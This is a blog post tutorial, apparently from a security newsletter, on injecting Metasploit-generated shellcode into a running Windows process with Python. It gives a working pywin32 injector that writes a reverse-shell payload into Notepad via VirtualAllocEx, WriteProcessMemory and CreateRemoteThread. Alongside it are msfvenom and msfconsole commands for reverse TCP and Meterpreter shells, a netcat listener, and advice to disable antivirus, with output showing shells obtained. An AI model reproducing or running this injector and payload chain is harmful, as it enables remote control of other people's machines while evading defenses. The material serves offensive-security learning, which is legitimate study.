Shellcode Injection

Time to shell-ebrate

Sep 03, 2022

Hello all. I felt that I should share a much cooler method of injection which involves shellcode!

Shellcode is quite literally just raw bytes of code, not too different from the assembly that we’ve been working with off and on over the past few posts. It often creates a “shell” for an attacker, hence the name shellcode. Fortunately for us, we don’t have to write it all by hand this time. This is a much more fun version of injection as we can customize the shellcode through tools like Metasploit. We will be using Metasploit today, so you may want to get familiar with it. Don’t worry, the BowTied Jungle has plenty of material on it.

Shellfish Security

Metasploit

Hello all! It’s been quite a while since my last post. I have been on vacation since finishing up my finals which has kept me from posting, but it’s time to get back into rhythm. This week we’re gonna take a break from Sec+ and go over a fun tool called…

3 years ago · BowTiedCrawfish

Zero to Hoodie

Introduction to Metasploit Part I

Hello, Hoodies! If you want to be a great pentester, there are some non-negotiables, and Network Pentesting is one of them! But learning metasploit is a lot like learning Python. There’s SO MUCH to learn that it doesn’t happen overnight. But we’re here to guide you through it. This is the first of many substacks on metasploit, and it’s a lot, so hold on tight…

2 years ago · 1 like · BowTiedCyber

Zero to Hoodie

Hacking Applied - Metasploit

Hello, Hoodies! So you want to be a hacker? Let’s show you how. You need to know how systems work, how tools work, and how to use tools to hack the systems. Sounds simple, and it is. So why isn’t everyone a hacker…

2 years ago · BowTiedCyber

Secondly, we can also take a break from C++! Hallelujah. Today, instead, we will use Python and its pywin32 library to perform the injection. This should be super easy, so you should definitely follow along! Don’t forget to disable your AV. Your shellcode will probably trip it.

Methodology

Use Metasploit to generate shellcode for a reverse TCP shell.
Write a Python program that injects the shellcode into a running process.
Create a reverse TCP handler in Metasploit or netcat.
Run the injection and wait for the handler to activate.
Eject your target machine’s CD drive.

Requirements

A Windows machine
Metasploit
Python (with the pywin32 library)
Preferably WSL2 or a Linux VM

Metasploit

First, you need a listening IP address. This is your IP address as it is the one that is listening for the reverse shell to ping you. You can use either ifconfig or ip addr.

$ ifconfig                                                                                                            eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500                                                                      inet 172.19.66.222  netmask 255.255.240.0  broadcast 172.19.79.255

Grab eth0 (or whatever your interface name is). Loopback (lo) also works. In my case, I just used 127.0.0.1. Note that if you’re doing this to another machine across networks, you will need your external IP.

Next, you need to generate your shellcode with Metasploit. This can be done in just 1 line 😱.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=8989 -f python

Obviously, replace LHOST with your IP address. Also, make sure your architecture matches that of the target process or else it will crash.

-p is our payload.
LHOST is our listening IP address.
LPORT is our listening port, can be pretty much anything.
-f is the language format of the payload (we’re using Python, duh).

You will get a spew of Python code to slap into a file. You can also redirect output (>) into a file for simplicity.

We’ll come back to Metasploit later if necessary. For now, we can move on to writing our code.

Python

If you don’t have pywin32 yet, just install it with pip3 install pywin32. You can also use ctypes if you’re cracked, but pywin32 is easiest.

Make sure you have your shellcode in your file (not pasting it here since it’s huge).

shellcode.py

import win32api
import win32con
import win32process
import win32com.client

def main():
	### Giant spew of shellcode ###
	target = "Notepad.exe"

	wmi = win32com.client.GetObject("winmgmts:")
	pids = wmi.ExecQuery(f"Select * from Win32_Process where Name = '{target}'")
	if not pids or not len(pids):
		print(f"Could not find process {target}")
		return

	proc = win32api.OpenProcess(win32con.PROCESS_ALL_ACCESS, False, pids[0].ProcessId)
	
	mem = win32process.VirtualAllocEx(proc, 0, len(
		buf), win32con.MEM_COMMIT | win32con.MEM_RESERVE, win32con.PAGE_EXECUTE_READWRITE)

	win32process.WriteProcessMemory(proc, mem, buf)
	thread, threadid = win32process.CreateRemoteThread(proc, None, 0, mem, 0, 0)

	print(f"Injected with id {threadid}")

	win32api.CloseHandle(thread)
	win32api.CloseHandle(proc)

if __name__ == "__main__":
	main()

Yep, that’s it. A shellcode injector in 20 SLOC.

Now we get to run it.

But first! We need to have a handler open. You can use either Metasploit, netcat, or any other TCP listener.

$ nc -lvvp 8989                                                                                                       Listening on LAPTOP-BOWTIEDC 8989

Now we can open Notepad.exe (or whatever our target process is) and run our shellcode injector.

$ nc -lvvp 8989                                                                                                       Listening on LAPTOP-BOWTIEDC 8989                                                                                       Connection received on localhost 56810                                                                                  Microsoft Windows [Version 10.0.22000.856]                                                                              (c) Microsoft Corporation. All rights reserved.                                                                                                                                                                                                 C:\Users\bowtiedcrawfish>

Hey look, a reverse shell. Now we can do pretty much whatever we want.

If we wanted to be even cooler, we could get a Meterpreter shell. We’ll have to remake our shellcode, but that’s easy.

$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=8989 -f python > out.py

You should definitely redirect it. It’s HUGE. You could also forego the -f switch and stick the raw output into a file to be read by your injector program. No hand-holding for that one :).

Slap all of that code into your file somehow. Then set up your Meterpreter handler.

$ msfconsole -x "use multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 127.0.0.1; set LPORT 8989; exploit"

And then open notepad and run your injector.

[*] Started reverse TCP handler on 127.0.0.1:8989                                                                       [*] Sending stage (175174 bytes) to 127.0.0.1                                                                           [*] Meterpreter session 1 opened (127.0.0.1:8989 -> 127.0.0.1:56830 ) at 2022-09-02 10:46:16 -0500

meterpreter >

Now you have a Meterpreter shell! That was pretty easy, wasn’t it?

This should be obvious, but please don’t do anything illegal with what I’ve mentioned above. I am not responsible if you get caught. If you do get caught, I will make fun of you. Publicly.

Go!

-BowTiedCrawfish

Shellfish Systems and Security

Discussion about this post